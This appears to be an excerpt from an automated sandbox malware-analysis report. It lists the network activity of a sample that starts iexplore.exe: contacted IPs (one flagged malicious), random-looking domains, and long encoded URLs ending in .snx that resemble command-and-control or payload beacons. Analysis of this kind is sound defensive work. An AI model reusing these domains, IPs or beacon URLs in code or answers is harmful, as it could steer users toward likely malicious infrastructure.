            Network: pronpepsipirpyamvioerd.com 80.208.230.180 ports 49784, 49785, 49786 (RACKRAYUABRakrejusLT, Lithuania)
        iexplore.exe (started)
        iexplore.exe (started)

Contacted Public IPs

IP               Domain    Country               ASN    ASN Name               Malicious
104.16.249.249   unknown   United States         13335  CLOUDFLARENETUS        false
80.208.230.180   unknown   Lithuania             62282  RACKRAYUABRakrejusLT   false
45.67.231.135    unknown   Moldova Republic of   50673  SERVERIUS-ASNL         true

Contacted Domains

Name IP Active
pronpepsipirpyamvioerd.com 80.208.230.180 true
mozilla.cloudflare-dns.com 104.16.249.249 true
eorctconthoelrrpentshfex.com 45.67.231.135 true
resolver1.opendns.com 208.67.222.222 true
1.0.0.127.in-addr.arpa unknown unknown
assets.onestore.ms unknown unknown
8.8.8.8.in-addr.arpa unknown unknown
ajax.aspnetcdn.com unknown unknown

Contacted URLs

Name / Malicious / Antivirus Detection / Reputation

http://pronpepsipirpyamvioerd.com/manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx
    Malicious: false    Antivirus Detection: Avira URL Cloud: safe    Reputation: unknown

http://pronpepsipirpyamvioerd.com/manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx
    Malicious: false    Antivirus Detection: Avira URL Cloud: safe    Reputation: unknown

http://pronpepsipirpyamvioerd.com/manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx
    Malicious: false    Antivirus Detection: Avira URL Cloud: safe    Reputation: unknown

http://pronpepsipirpyamvioerd.com/favicon.ico
    Malicious: false    Antivirus Detection: Avira URL Cloud: safe    Reputation: unknown